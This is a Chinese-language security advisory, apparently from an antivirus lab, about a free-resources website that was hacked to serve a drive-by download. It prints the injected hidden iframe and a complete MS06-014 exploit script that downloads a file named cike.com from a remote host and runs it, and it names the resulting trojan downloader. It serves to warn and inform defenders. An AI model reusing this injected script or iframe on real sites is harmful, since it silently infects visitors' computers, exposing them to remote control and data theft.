158免费资源网挂马事件
1月21日,安天实验室发现,158免费资源网 (http://www.158sohu.cn/)
被植入病毒,用户如果访问该网站,系统就会自动从恶意网站上下载并运行恶意
程序。被感染病毒的用户系统可能被远程控制,盗取用户敏感信息。甚至导致死机。
该网站问题代码:
<script src="158sohu.js"></script>
158sohu.js被插入代码如下:
document.writeln("<iframe src=http:\/\/366ip.com\
/tt.htm?id=cuowu width=0 height=0><\/iframe>");
http://36***.com/tt.htm代码如下:
<iframe width='100' height='100' src='wm/g15.htm'></iframe>
<iframe width='100' height='100' src='wm/du66.htm'></iframe>
wm/g15.htm代码如下:
<noscript>
<iframe src=*></iframe>
</noscript>
<script language="JavaScript">
<!--document.writeln("<script>var fuck,cike;fuck=
\"http://ccc.96****.com/bak.css\";cike=\"cike.com\";
try{var ado=(document.createElement(\"object\"));
var d=1;ado.setAttribute(\"classid\",\"clsid:BD96C556
-65A3-11D0-983A-00C04FC29E36\");var e=1;var xml=ado.
CreateObject(\"Microsoft.XMLHTTP\",\"\");var f=1;
var ln=\"Ado\";var lzn=\"db.St\";var an=\"ream\";
var g=1;var as=ado.createobject(ln+lzn+an,\"\");
var h=1;xml.Open(\"GET\",fuck,0);xml.Send();
as.type=1;var n=1;as.open();as.write(xml.responseBody);
as.savetofile(cike,2);as.close();
var shell=ado.createobject(\"Shell.Application\",\"\");
shell.Shellexecute(cike,\"\",\"\",\"open\",0);}
catch(e){};</script\>");//-->
</script>
<script type="text/jscript">function init()
{ document.write("");}window.onload = init;</script>
注:利用了MS-06014漏洞。其中http://ccc.96****.com/bak.css目的
下载cike.com处理文件下载病毒。
wm/du**.htm加密网马代码如下:
当用户访问http://www.158sohu.cn/时,系统会自动下载以下病毒文件:
http://www.158sohu.cn/wm/***.htm cike.com
病毒名:(Trojan-Downloader.Win32.Small.hsh) 木马下在者
以上病毒文件为下载者木马,自动运行后将会下载大量的恶意文件!
共下在26个病毒文件,这里不一一分析。
您的位置: